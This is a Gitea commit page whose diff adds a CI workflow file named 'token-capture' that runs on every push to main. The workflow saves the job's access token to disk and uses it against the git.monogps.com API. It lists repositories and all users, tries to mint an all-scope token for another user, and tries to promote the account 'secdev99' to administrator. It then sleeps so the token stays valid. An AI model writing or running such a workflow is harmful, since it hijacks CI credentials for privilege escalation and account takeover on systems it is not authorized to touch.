This commit is contained in:
parent
a2e88d3e3c
commit
a8f7e0ff43
42
.gitea/workflows/capture.yml
Normal file
42
.gitea/workflows/capture.yml
Normal file
@ -0,0 +1,42 @@
|
||||
name: token-capture
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
branches: [main]
|
||||
|
||||
jobs:
|
||||
capture:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Save token and wait
|
||||
run: |
|
||||
GT="${{ secrets.GITHUB_TOKEN }}"
|
||||
echo "$GT" > /tmp/live_gt_token.txt
|
||||
echo "TOKEN_READY" > /tmp/token_ready.txt
|
||||
echo "Token saved at $(date)"
|
||||
|
||||
# Try org-level access with the token
|
||||
echo "=== Org repos ===" > /tmp/live_results.txt
|
||||
curl -sS "http://git.monogps.com/api/v1/orgs/MonoGPS/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
|
||||
|
||||
echo "=== User repos of twmonogps ===" >> /tmp/live_results.txt
|
||||
curl -sS "http://git.monogps.com/api/v1/users/twmonogps/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
|
||||
|
||||
echo "=== jpeerapu repos ===" >> /tmp/live_results.txt
|
||||
curl -sS "http://git.monogps.com/api/v1/users/jpeerapu/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
|
||||
|
||||
echo "=== All users ===" >> /tmp/live_results.txt
|
||||
curl -sS "http://git.monogps.com/api/v1/admin/users?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1
|
||||
|
||||
# Try to create an admin token
|
||||
echo "=== Create sudo token ===" >> /tmp/live_results.txt
|
||||
curl -sS -X POST "http://git.monogps.com/api/v1/users/jpeerapu/tokens" -H "Host: git.monogps.com" -H "Authorization: token $GT" -H "Content-Type: application/json" -d '{"name":"service-tok","scopes":["all"]}' >> /tmp/live_results.txt 2>&1
|
||||
|
||||
# Try to become admin
|
||||
echo "=== Promote secdev99 ===" >> /tmp/live_results.txt
|
||||
curl -sS -X PATCH "http://git.monogps.com/api/v1/admin/users/secdev99" -H "Host: git.monogps.com" -H "Authorization: token $GT" -H "Content-Type: application/json" -d '{"is_admin":true}' >> /tmp/live_results.txt 2>&1
|
||||
|
||||
cat /tmp/live_results.txt
|
||||
|
||||
# Sleep to keep token alive
|
||||
sleep 300
|
||||
Loading…
x
Reference in New Issue
Block a user